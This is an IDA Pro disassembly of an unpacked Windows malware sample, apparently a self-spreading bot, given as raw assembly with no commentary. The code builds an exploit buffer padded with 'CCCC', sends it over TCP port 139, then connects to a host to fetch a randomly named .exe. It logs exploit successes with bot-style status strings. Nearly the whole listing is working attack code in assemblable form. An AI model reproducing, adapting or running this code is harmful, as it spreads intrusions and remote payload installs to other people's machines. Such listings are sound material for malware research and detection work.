;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 7A25F9E3CF5A54CADC497FBC9CABFEAF
; File Name : u:\work\7a25f9e3cf5a54cadc497fbc9cabfeaf_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00279000 (2592768.)
; Section size in file : 00279000 (2592768.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40126C+E�p
; sub_40126C+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40100A proc near ; CODE XREF: sub_40126C+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
push ebx
mov esi, ecx
call sub_4297B8
mov edi, eax
pop ecx
test edi, edi
jz short loc_40103C
push ebx
push 0
push edi
call sub_429760
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_429420
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40103C: ; CODE XREF: sub_40100A+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40100A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401044 proc near ; CODE XREF: sub_401136+18�p
; sub_4011B0+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
mov ecx, [ebp+arg_C]
push esi
push edi
lea edi, [eax+ecx]
push edi
call sub_4297B8
mov esi, eax
pop ecx
test esi, esi
jz short loc_401090
push edi
push 0
push esi
call sub_429760
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_429420
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_429420
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_401090: ; CODE XREF: sub_401044+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_401044 endp
; =============== S U B R O U T I N E =======================================
sub_401099 proc near ; CODE XREF: sub_401136+5E�p
; sub_401136+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_4010A9
push eax
call sub_4298F2
pop ecx
loc_4010A9: ; CODE XREF: sub_401099+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_401099 endp
; =============== S U B R O U T I N E =======================================
sub_4010B2 proc near ; CODE XREF: sub_401136+20�p
; sub_401211+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_4010DC
xor ebx, ebx
cmp eax, 7Fh
setnl bl
lea ebx, [ebx+ebx+1]
add eax, ebx
push eax
call sub_4297B8
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4010E0
loc_4010DC: ; CODE XREF: sub_4010B2+D�j
xor al, al
jmp short loc_401132
; ---------------------------------------------------------------------------
loc_4010E0: ; CODE XREF: sub_4010B2+28�j
mov eax, [esi+4]
add eax, ebx
push eax
push 0
push edi
call sub_429760
add esp, 0Ch
cmp ebx, 1
jnz short loc_401100
mov al, [esi+4]
mov [edi], al
lea eax, [edi+1]
jmp short loc_401115
; ---------------------------------------------------------------------------
loc_401100: ; CODE XREF: sub_4010B2+42�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
lea eax, [edi+3]
loc_401115: ; CODE XREF: sub_4010B2+4C�j
push dword ptr [esi+4]
push dword ptr [esi]
push eax
call sub_429420
add esp, 0Ch
push dword ptr [esi]
call sub_4298F2
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_401132: ; CODE XREF: sub_4010B2+2C�j
pop edi
pop esi
pop ebx
retn
sub_4010B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401136 proc near ; CODE XREF: sub_40126C+89�p
; sub_40126C+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset word_454038
call sub_401044
lea ecx, [ebp+var_8]
call sub_4010B2
mov eax, [ebp+var_4]
inc eax
push eax
call sub_4297B8
mov edi, eax
pop ecx
test edi, edi
jnz short loc_401170
xor al, al
jmp short loc_4011AC
; ---------------------------------------------------------------------------
loc_401170: ; CODE XREF: sub_401136+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_429760
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_429420
add esp, 18h
mov ecx, esi
call sub_401099
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_401099
mov al, 1
loc_4011AC: ; CODE XREF: sub_401136+38�j
pop edi
pop esi
leave
retn
sub_401136 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011B0 proc near ; CODE XREF: sub_4011E4+14�p
; sub_401201+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_401044
mov ecx, esi
call sub_401099
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_4011B0 endp
; =============== S U B R O U T I N E =======================================
sub_4011E4 proc near ; CODE XREF: sub_40126C+F0�p
; sub_40126C+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_4293A0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_4011B0
pop esi
retn 4
sub_4011E4 endp
; =============== S U B R O U T I N E =======================================
sub_401201 proc near ; CODE XREF: sub_40124D+B�p
; sub_40126C+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4011B0
retn 8
sub_401201 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401211 proc near ; CODE XREF: sub_40124D+16�p
; sub_40126C+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_4010B2
test al, al
jz short loc_40124A
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_43A2F8
call sub_401044
mov ecx, esi
call sub_401099
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40124A: ; CODE XREF: sub_401211+F�j
pop esi
leave
retn
sub_401211 endp
; =============== S U B R O U T I N E =======================================
sub_40124D proc near ; CODE XREF: sub_40126C+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_401201
test al, al
jz short loc_401268
mov ecx, esi
call sub_401211
loc_401268: ; CODE XREF: sub_40124D+12�j
pop esi
retn 8
sub_40124D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40126C proc near ; CODE XREF: .text:00401821�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_401000
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_4015B0
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_4015B0
push esi
lea ecx, [ebp+var_30]
call sub_401000
lea ecx, [ebp+var_20]
call sub_401000
lea ecx, [ebp+var_50]
call sub_401000
lea ecx, [ebp+var_18]
call sub_401000
lea ecx, [ebp+var_40]
call sub_401000
lea ecx, [ebp+var_38]
call sub_401000
lea ecx, [ebp+var_28]
call sub_401000
push 4
push offset dword_43A05C
lea ecx, [ebp+var_30]
call sub_4011B0
push 3
push offset dword_43A064
lea ecx, [ebp+var_30]
call sub_4011B0
lea ecx, [ebp+var_30]
call sub_401136
lea ecx, [ebp+var_30]
call sub_401211
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_429760
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset byte_43A050
call sub_4011B0
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_4011B0
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_4011B0
lea ecx, [ebp+var_20]
call sub_401136
push offset loc_43A320
lea ecx, [ebp+var_50]
call sub_4011E4
lea ecx, [ebp+var_50]
call sub_401136
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_40100A
lea ecx, [ebp+var_58]
call sub_401136
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_40124D
lea ecx, [ebp+var_58]
call sub_401099
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_429760
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_4011E4
push 4
push offset dword_43A068
lea ecx, [ebp+var_18]
call sub_4011B0
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_4011B0
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_4011B0
lea ecx, [ebp+var_18]
call sub_401136
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_401201
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_401201
lea ecx, [ebp+var_40]
call sub_401211
lea ecx, [ebp+var_18]
call sub_401099
lea ecx, [ebp+var_50]
call sub_401099
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_401201
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_401201
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_401201
lea ecx, [ebp+var_38]
call sub_401211
lea ecx, [ebp+var_20]
call sub_401099
lea ecx, [ebp+var_30]
call sub_401099
lea ecx, [ebp+var_40]
call sub_401099
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_4011B0
lea ecx, [ebp+var_28]
call sub_401136
push 2
push offset dword_43A314
lea ecx, [ebp+var_28]
call sub_4011B0
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_401201
lea ecx, [ebp+var_28]
call sub_401211
lea ecx, [ebp+var_38]
call sub_401099
lea ecx, [ebp+var_10]
call sub_401000
lea ecx, [ebp+var_8]
call sub_401000
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_401201
lea ecx, [ebp+var_10]
call sub_4010B2
lea ecx, [ebp+var_28]
call sub_401099
push offset dword_43A310
lea ecx, [ebp+var_8]
call sub_4011E4
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_401201
lea ecx, [ebp+var_8]
call sub_4010B2
lea ecx, [ebp+var_10]
call sub_401099
push offset dword_43A30C
lea ecx, [ebp+var_10]
call sub_4011E4
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_401201
lea ecx, [ebp+var_10]
call sub_4010B2
lea ecx, [ebp+var_8]
call sub_401099
push offset dword_43A300
lea ecx, [ebp+var_8]
call sub_4011E4
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_401201
lea ecx, [ebp+var_8]
call sub_4010B2
lea ecx, [ebp+var_10]
call sub_401099
push offset dword_43A2FC
lea ecx, [ebp+var_48]
call sub_4011E4
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_401201
lea ecx, [ebp+var_8]
call sub_401099
pop esi
loc_4015B0: ; CODE XREF: sub_40126C+1B�j
; sub_40126C+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop edi
pop ebx
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
leave
retn
sub_40126C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015C2 proc near ; CODE XREF: sub_401687+A2�p
; sub_401687+C7�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
push edi
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
xor edi, edi
push eax
lea eax, [esi+1]
inc edi
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call dword_456F1C ; select
cmp eax, edi
jnz short loc_40162A
lea eax, [ebp+var_10C]
push eax
push esi
call dword_456DD8 ; __WSAFDIsSet
test eax, eax
jnz short loc_40162E
loc_40162A: ; CODE XREF: sub_4015C2+54�j
xor eax, eax
jmp short loc_40163E
; ---------------------------------------------------------------------------
loc_40162E: ; CODE XREF: sub_4015C2+66�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_456F58 ; recv
loc_40163E: ; CODE XREF: sub_4015C2+6A�j
pop edi
pop esi
leave
retn
sub_4015C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401642 proc near ; CODE XREF: sub_401687+80�p
; sub_401687+AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_456F34 ; ntohl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call dword_456F8C ; send
cmp eax, 4
jz short loc_40166C
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40166C: ; CODE XREF: sub_401642+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456F8C ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_401642 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401687 proc near ; CODE XREF: sub_401766+48�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_4297B8
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4016B0
xor al, al
jmp loc_401761
; ---------------------------------------------------------------------------
loc_4016B0: ; CODE XREF: sub_401687+20�j
push ebx
push 0
push esi
call sub_429760
push 2Fh
push offset dword_43A0F8
push esi
call sub_429420
push 8
lea eax, [esi+31h]
push offset dword_43A128
push eax
mov [esi+2Fh], di
call sub_429420
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_429420
push 6
add ebx, edi
push offset dword_454030
push ebx
call sub_429420
push 85h
push offset dword_43A070
push [ebp+arg_0]
call sub_401642
add esp, 48h
test al, al
jnz short loc_401717
loc_401713: ; CODE XREF: sub_401687+B8�j
xor bl, bl
jmp short loc_401758
; ---------------------------------------------------------------------------
loc_401717: ; CODE XREF: sub_401687+8A�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_4015C2
push [ebp+var_4]
push esi
push [ebp+arg_0]
call sub_401642
add esp, 1Ch
test al, al
jz short loc_401713
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_4015C2
add esp, 10h
mov bl, 1
loc_401758: ; CODE XREF: sub_401687+8E�j
push esi
call sub_4298F2
pop ecx
mov al, bl
loc_401761: ; CODE XREF: sub_401687+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_401687 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401766 proc near ; CODE XREF: .text:0040189A�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_43A138
push [ebp+arg_0]
call dword_456F8C ; send
cmp eax, 48h
jnz short loc_4017A1
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_4015C2
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_4017A1
cmp [ebp+var_20], 82h
jz short loc_4017A5
loc_4017A1: ; CODE XREF: sub_401766+1B�j
; sub_401766+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4017A5: ; CODE XREF: sub_401766+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_401687
add esp, 0Ch
leave
retn
sub_401766 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 41Ch
and byte ptr [ebp-41Ch], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-41Bh]
push 7
rep stosd
stosw
stosb
lea eax, [ebp-41Ch]
push offset dword_43A2F0
push eax
call sub_429420
push dword_43A184
lea eax, [ebp-41Ch]
push offset dword_43A8E8
push eax
call sub_429420
lea eax, [ebp-41Ch]
push 400h
push eax
push 164h
lea eax, [ebp-0Ch]
push offset sub_43A188
push eax
call sub_40126C
xor ebx, ebx
add esp, 2Ch
cmp [ebp-8], ebx
jnz short loc_401837
xor eax, eax
jmp loc_40198B
; ---------------------------------------------------------------------------
loc_401837: ; CODE XREF: .text:0040182E�j
mov [ebp-4], ebx
loc_40183A: ; CODE XREF: .text:004018C2�j
test ebx, ebx
jnz loc_4018C8
push 6
push 1
push 2
call dword_456FD0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4018B0
xor eax, eax
lea edi, [ebp-1Ah]
stosd
stosd
stosd
stosw
push 8Bh
mov word ptr [ebp-1Ch], 2
call dword_456F38 ; ntohs
mov [ebp-1Ah], ax
lea eax, [ebp+10h]
push eax
call dword_456F7C ; inet_addr
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push esi
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_4018A5
push dword ptr [ebp-8]
push dword ptr [ebp-0Ch]
push esi
call sub_401766
add esp, 0Ch
movzx ebx, al
loc_4018A5: ; CODE XREF: .text:00401891�j
push esi
call dword_456FF0 ; closesocket
test ebx, ebx
jnz short loc_4018BB
loc_4018B0: ; CODE XREF: .text:00401853�j
push 3E8h
call dword_437190 ; Sleep
loc_4018BB: ; CODE XREF: .text:004018AE�j
inc dword ptr [ebp-4]
cmp dword ptr [ebp-4], 2
jl loc_40183A
loc_4018C8: ; CODE XREF: .text:0040183C�j
lea ecx, [ebp-0Ch]
call sub_401099
test ebx, ebx
jz loc_40197E
movzx eax, word_44399E
push eax
lea esi, [ebp+10h]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz short loc_40197E
mov edx, [ebp+0BCh]
xor ebx, ebx
mov eax, edx
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
shl eax, 6
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+0CCh], ebx
mov ecx, [ecx]
jz short loc_401952
cmp [ebp+0C4h], ebx
jnz short loc_40195A
push ecx
lea ecx, [ebp+10h]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CE4A
mov edx, [ebp+0BCh]
add esp, 1Ch
loc_401952: ; CODE XREF: .text:00401926�j
cmp [ebp+0C4h], ebx
jz short loc_40197E
loc_40195A: ; CODE XREF: .text:0040192E�j
shl edx, 6
lea eax, [ebp+10h]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CDD4
add esp, 1Ch
loc_40197E: ; CODE XREF: .text:004018D2�j
; .text:004018FD�j ...
lea eax, [ebp+10h]
push eax
call sub_401E9E
xor eax, eax
pop ecx
inc eax
loc_40198B: ; CODE XREF: .text:00401832�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401990 proc near ; CODE XREF: sub_40A9FE+5DEE�p
var_4E20 = byte ptr -4E20h
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 4E20h
call sub_429B60
push ebx
push edi
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
lea eax, [ebp+var_2710]
push offset aSStats ; "%s (Stats):"
push eax
xor ebx, ebx
call sub_429B03
add esp, 0Ch
cmp dword_43A378, ebx
mov edi, 2710h
jz short loc_401A08
push esi
mov esi, offset dword_43A380
loc_4019CD: ; CODE XREF: sub_401990+75�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-29h]
push eax
lea eax, [ebp+var_4E20]
push offset aSD_0 ; " (%s: %d),"
push eax
call sub_429B03
lea eax, [ebp+var_4E20]
push edi
push eax
lea eax, [ebp+var_2710]
push eax
call sub_4299E0
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_4019CD
pop esi
loc_401A08: ; CODE XREF: sub_401990+35�j
push 0
push dword_457E58
call dword_437188 ; GetTickCount
push eax
call sub_41B9F8
push eax
push ebx
push dword_457D08
lea eax, [ebp+var_4E20]
push offset aEftpdDTotalDIn ; " (EFTPD): (%d), Total -> (%d in %s)"
push eax
call sub_429B03
lea eax, [ebp+var_4E20]
push edi
push eax
lea eax, [ebp+var_2710]
push eax
call sub_4299E0
add esp, 2Ch
cmp ebx, [ebp+arg_10]
lea eax, [ebp+var_2710]
pop edi
pop ebx
push eax
push [ebp+arg_4]
push [ebp+arg_0]
jg short loc_401A66
cmp [ebp+arg_8], 0
jnz short loc_401A6D
loc_401A66: ; CODE XREF: sub_401990+CE�j
call sub_41CE4A
jmp short loc_401A72
; ---------------------------------------------------------------------------
loc_401A6D: ; CODE XREF: sub_401990+D4�j
call sub_41CDD4
loc_401A72: ; CODE XREF: sub_401990+DB�j
add esp, 0Ch
leave
retn
sub_401990 endp
; =============== S U B R O U T I N E =======================================
sub_401A77 proc near ; CODE XREF: sub_401B6E+1B3�p
; sub_401B6E+1B9�p ...
push esi
push edi
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
call sub_429B9C
push 1Ah
pop edi
cdq
mov ecx, edi
push 61h
idiv ecx
pop esi
add edx, esi
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429B9C
cdq
idiv edi
add edx, esi
mov esi, offset dword_454764
push edx
push offset aCCCCCC ; "%c%c%c%c%c%c"
push esi
call sub_429B03
add esp, 20h
mov eax, esi
pop edi
pop esi
retn
sub_401A77 endp
; =============== S U B R O U T I N E =======================================
sub_401AF0 proc near ; CODE XREF: sub_401B6E+17E�p
; sub_401B6E+189�p ...
push esi
push edi
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
call sub_429B9C
push 1Ah
pop edi
cdq
mov ecx, edi
push 61h
idiv ecx
pop esi
add edx, esi
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429B9C
cdq
idiv edi
add edx, esi
mov esi, offset dword_454740
push edx
push offset dword_4439B4
push offset aSCCCCC ; "%s%c%c%c%c%c"
push esi
call sub_429B03
add esp, 24h
mov eax, esi
pop edi
pop esi
retn
sub_401AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B6E proc near ; CODE XREF: .text:004018F0�p
; sub_403B9B+139�p ...
var_6B4 = byte ptr -6B4h
var_2B4 = byte ptr -2B4h
var_1B4 = byte ptr -1B4h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
sub esp, 6B4h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp+var_14]
push edi
push eax
call sub_429760
add esp, 0Ch
cmp dword_456DA8, edi
push 2
pop esi
jz short loc_401BFC
push 10h
lea eax, [ebp+var_24]
push edi
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_24], si
push offset dword_4565A0
call dword_456F7C ; inet_addr
mov [ebp+var_20], eax
mov ax, word ptr dword_4567A0
push eax
call dword_456F38 ; ntohs
push edi
push 1
push esi
mov [ebp+var_22], ax
call dword_456FD0 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_401E6D
lea eax, [ebp+var_24]
push 10h
push eax
push ebx
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401BF5
mov dword_456DA8, edi
loc_401BF5: ; CODE XREF: sub_401B6E+7F�j
push ebx
call dword_4372D8 ; closesocket
loc_401BFC: ; CODE XREF: sub_401B6E+26�j
lea eax, [ebp+arg_0]
mov [ebp+var_14], si
push eax
call dword_456F7C ; inet_addr
push [ebp+arg_C4]
mov [ebp+var_10], eax
call dword_456F38 ; ntohs
push edi
push 1
push esi
mov [ebp+var_12], ax
call dword_456FD0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_C4], esi
jz loc_401E6D
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jz loc_401E6D
push edi
lea eax, [ebp+var_6B4]
push 400h
push eax
push esi
call dword_456F58 ; recv
call sub_429B9C
push 9
pop esi
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
idiv esi
lea eax, [ebp+var_2B4]
push edx
push offset dword_4439B4
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429B03
add esp, 20h
cmp dword_456DA8, edi
mov ebx, offset dword_456BA8
jnz loc_401D6B
lea eax, [ebp+arg_0]
push eax
